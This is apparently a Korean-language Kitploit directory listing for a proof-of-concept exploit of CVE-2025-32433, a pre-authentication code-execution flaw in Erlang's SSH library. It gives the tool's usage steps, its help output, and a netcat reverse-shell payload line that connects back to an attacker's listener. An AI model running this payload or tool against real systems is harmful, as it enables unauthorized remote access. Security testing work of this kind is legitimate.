Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-3243 — CVE-2025-32433에 대한 개념 증명(PoC) 익스플로잇으로, Erlang의 SSH 라이브러리에서 잘못된 SSH_MSG_CHANNEL_REQUEST 패킷을 통해 인증 전 코드 실행을 허용하는 심각한 취약점입니다. | Kitploit
도구/GitHubGitHub/tenebrae93/cve-2025-3243
Payload GenerationVulnerability AnalysisExploitationShellcodePenetration TestingRemote Access Tool
GitHubtenebrae93/cve-2025-3243

CVE-2025-3243

CVE-2025-32433에 대한 개념 증명(PoC) 익스플로잇으로, Erlang의 SSH 라이브러리에서 잘못된 SSH_MSG_CHANNEL_REQUEST 패킷을 통해 인증 전 코드 실행을 허용하는 심각한 취약점입니다.

저장소 보기
711년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-32433 Erlang SSH 라이브러리 익스플로잇

CVE-2025-32433에 대한 개념 증명(PoC) 익스플로잇으로, Erlang SSH 라이브러리의 치명적인 취약점을 이용해 잘못된 형식의 SSH_MSG_CHANNEL_REQUEST 패킷을 통해 인증 전(pre-authentication) 코드 실행을 허용합니다.


기능

  • 원본 익스플로잇 - Matthew Keeley
  • 업데이트 버전 - Tyler Ramsbey:
    • LHOST, LPORT, RHOST, RPORT용 명령줄 인자
    • argparse를 통한 내장 도움말 및 사용법
    • os:cmd("nc LHOST LPORT -e /bin/sh").를 사용한 Erlang 스타일 리버스 셸 페이로드
    • 각 단계별 깔끔한 함수 분해 및 상태 로깅

사전 요구 사항

  • Python 3
  • 공격 머신에서 작동하는 nc(Netcat) 리스너
  • 대상 SSH 서비스(기본 포트 22)에 대한 네트워크 접근

사용법

  1. 공격 머신에서 리스너를 시작합니다:

    root@kitploit:~
    nc -lvnp 4444
    
  2. 익스플로잇을 실행합니다:

    root@kitploit:~
    python3 CVE-2025-32433.py -lh [Attacker-IP] -lp [Attacker-Port] -rh [Victim-IP] -rp [Victim-Port]
    
  3. 셸이 리스너로 다시 연결될 때까지 기다립니다.

도움말 메뉴

root@kitploit:~
$ python3 CVE-2025-32433.py -h
usage: CVE-2025-32433.py [-h] -lh LHOST -lp LPORT [-rh RHOST] [-rp RPORT]

Send a pre-auth SSH channel request with an Erlang RCE payload
to get a reverse shell

optional arguments:
  -h, --help            show this help message and exit
  -lh LHOST, --lhost LHOST
                        Local host/IP to receive the reverse shell
  -lp LPORT, --lport LPORT
                        Local port to receive the reverse shell
  -rh RHOST, --rhost RHOST
                        Target SSH server IP (default: 10.10.248.101)
  -rp RPORT, --rport RPORT
                        Target SSH server port (default: 22)

크레딧

  • 원본 스크립트 - Matthew Keeley (MattKeeley)
  • 이 업데이트 버전 - Tyler Ramsbey

면책 조항

이 코드는 본인이 소유했거나 명시적 테스트 허가를 받은 시스템에서만 사용하십시오. 취약점의 무단 악용은 불법이며 비윤리적입니다.

도구 다운로드